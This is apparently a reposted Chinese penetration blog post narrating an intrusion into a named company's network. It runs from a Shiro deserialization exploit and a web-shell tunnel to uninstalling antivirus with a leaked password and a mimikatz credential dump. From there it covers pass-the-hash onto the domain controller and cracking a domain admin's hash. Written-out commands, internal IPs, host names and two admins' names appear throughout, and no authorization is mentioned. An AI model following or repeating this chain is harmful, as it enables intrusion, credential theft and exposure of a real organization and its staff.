WEB打点
开局一个登录框,从翻看js到目录扫描都没有什么大收获,然后在对登录框进行测试时,发现了一个rememberMe=deleteMe,然后瞬间狂喜,这不是我的好兄弟,Shiro吗?
然后想都不想,立马拿出我的大宝剑就是来上一梭子。
shiro反序列化漏洞利用
然后使用工具也是简单的跑出来密钥和利用链。
进行命令执行发现 可以成功执行,且存在域环境
然后发现有域,那就先简单查下看看有没有杀软吧。
然后一套组合拳打上去,发现打到棉花上了!!!!!
怪不得我的反弹shell,没有成功。八成因为杀软存在!
然后经过我老道的经验,也是一下子就找到了根目录C:Program Files (x86)BioSecurityMainResourcetomcatwebappsROOT想着试试免杀马,能不能上传,然后来操作,毕竟使用工具渗透还是有点不方便。
结果显示如上,估计是java环境太低,导致不解析这个木马吧。索性转头就上传一个suo5来挂一个http隧道。
cd C:Program Files (x86)BioSecurityMainResourcetomcatwebappsROOT & powershell.exe -Command "Invoke-WebRequest -Uri http://127.0.0.1:8080/suo5.jsp -OutFile suo5.jsp" 上传suo5.jsp尝试suo5连接成功
使用Proxifier工具进行代理,远程登录
虽然成功登录,但是存在一个杀软很是头疼,目前也没有什么免杀的工具使用,所以先看看能不能有什么骚姿势来绕过吧。
经过长达2分半的信息收集,果然皇天不负有心人,运维人员也是心大,在同一安装和卸载BitDefender (XDR)时,图方便留下了bat脚本,然后还没有删除。
脚本里面也是成功的留下了卸载的密码,然后我也是不出意外的直接执行脚本,成功卸载杀软!
然后使用和suo5文件上传操作一样,将后门文件下载下来并执行,成功上线cs
在shiro工具里面执行后门文件,直接得到一个system权限的会话
域渗透
使用cmd命令对其他域内信息收集
当前主机名称 hostname PAKAR08域内用户 net user /domain辅助域控 net time /domain PAKAR07.grupopakar.com.mx 192.168.101.7查询域管理员用户 net group "domain admins" /domain查询当前用户属于哪个域控 net config Workstation 或者使用(net qury dpc)查看主域控目标主域控 grupopakar.com.mx 192.168.101.3查看域内用户 net user /domain
查询当前用户属于哪个域控net config Workstationping 以下发现域控IP为 192.168.101.3
查询域管理员用户net group "domain admins" /domain
这里查看当前域内的域管理员账户,然后注意看圈住的两个账户,下面要考!!
bloodhund进行信息收集
发现当前机器与两个域管账户有过会话
elias.nolasco和sebastian.candia两个域管账户
猕猴桃提取凭据
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" > pssword.txt将结果输出到一个文件下面,在本地将其下载下来
然后查看文件,你们猜发现了什么??
PTH攻击
使用suo5代理,直接在本地攻击,工具使用的是impacket-python包里的工具成功横移到域控
横移成功
登录域控主机
1、使用cmd5网站进行hash爆破,爆出elias.nolasco用户密码
2、或和通过pth攻击获得的shell进行创建用户进行登录(域管用户默认加入本地管理员组)
原文始发于微信公众号(伍六七安全):实战-从Shiro反序列化到域控
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论